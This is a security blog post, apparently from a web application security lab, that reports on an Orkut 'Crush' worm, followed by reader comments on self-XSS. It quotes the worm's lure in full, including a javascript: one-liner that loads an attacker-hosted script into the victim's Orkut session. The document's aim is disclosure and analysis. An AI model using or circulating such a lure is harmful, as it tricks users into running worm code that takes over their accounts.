Cenzic 232 Patent
Paid Advertising
web application security lab

Orkut “Crush” Worm

I’m a little behind the times, catching up on my email, but I thought I’d post this first since it’s probably some of the most interesting stuff. Keyshor just sent me an interesting snippet related to another Orkut worm that I’m affectionately calling “Crush” given the mode of transport, which is the Orkut crush. Here’s Keyshor’s email (cleaned up slightly):

This is the vulnerable scrap

Find out who has crush on u….
wait 4 few minutes after pressing enter
Author–> Coder http://www.orkut.com/Profile.aspx?uid=12437994075478369725>:)
Just copy the JavaScript, paste it in your address bar and PRESS ENTER

*javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://002292.googlepages.com/crush.js';void(0)*

Trust me, ITS WORKING!!!

The site is down now, but I threw up the JavaScript source in the list of XSS worms so people could check it out. I was able to pull another version that was still alive here. It also appears that it may at least at one point have been a greasemonkey plugin by the headers, which is an interesting way to debug your DHTML malware, I suppose. Anyway, great snippet for those who want to do some more analysis.

7 Responses to “Orkut “Crush” Worm”

  1. kuza55 Says:

    Now, I don’t know how successful this was, but I’m going to assume it hit a fair few people.

    So now we’ve finally reached the equivalent of those mass mailing worms where users have to download trojans; I honestly hope we don’t end up with an anti-javascript-virus solution which tries to match all the websites you view to common ‘malware’ such as this…

    On the other hand if these ever get prolific, I wouldn’t be surprised if we did…

    Protecting users from themselves seems to be the name of the game these days.

  2. sdsdsd Says:

    Viewing the XSS worm list makes Avast go insane. What’s going on? I’m going to have to use w3m to view that page. Agh. I’m on a work computer, thank god.

  3. Wladimir Palant Says:

    LOL
    This reminds me of that manual virus joke…

  4. Robert Says:

    Also available here:
    http://userscripts.org/scripts/review/23071?format=txt

  5. blah Says:

    “Just copy the JavaScript, paste it in your address bar and PRESS ENTER”… Since it’s in an XSS worms list, where is the XSS, may I ask?

  6. RSnake Says:

    @blah - funny, I thought you’d ask where the worm is, not where the XSS is, since the worm question is the only part that I think is pretty non-straight forward.

    The XSS part is where you type something into your browser which requests an inclusion of a script from another domain and pulls it into the DOM for the page in question, which in this case is Orkut. Now that we all understand what XSS is….

    I think this kind of XSS is pretty un-interesting in the same way I think Phishing is un-interesting but if people are still getting owned by it, it’s definitely worth mentioning, don’t you?

  7. Kyran Says:

    Hah!
    Please take a hammer and smash it into random parts of your computer, then proceed to mail me your credit card number. trust me, IT’S WORKING!